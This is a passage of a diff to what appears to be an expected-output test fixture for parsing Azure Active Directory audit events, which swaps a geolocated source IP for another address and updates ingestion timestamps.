User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735126\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"a385881d-d5e8-47b0-83ea-d50d6c9906e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125100400Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735126\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"a385881d-d5e8-47b0-83ea-d50d6c9906e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -9656,25 +8828,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -9688,7 +8842,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -9824,7 +8978,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -9836,12 +8990,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036374300Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735117\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.
0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"227bc85c-0c21-4df3-9e11-3a24f104e1e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 
APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125107100Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"N
ame\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735117\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryse
rvice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"227bc85c-0c21-4df3-9e11-3a24f104e1e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 
APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}",
 "code": "AzureActiveDirectory",
 "provider": "AzureActiveDirectory",
 "kind": "event",
@@ -9867,25 +9021,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "83.57.233.151"
+ "ip": "67.43.156.15"
 },
 "tags": [
 "preserve_original_event"
@@ -9899,7 +9035,7 @@
 "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com",
 "ResultStatus": "Success",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "ExtendedProperties": {
 "actorObjectClass": "User",
 "teamName": "MSODS.",
@@ -10035,7 +9171,7 @@
 "asr"
 ],
 "ip": [
- "83.57.233.151"
+ "67.43.156.15"
 ]
 },
 "organization": {
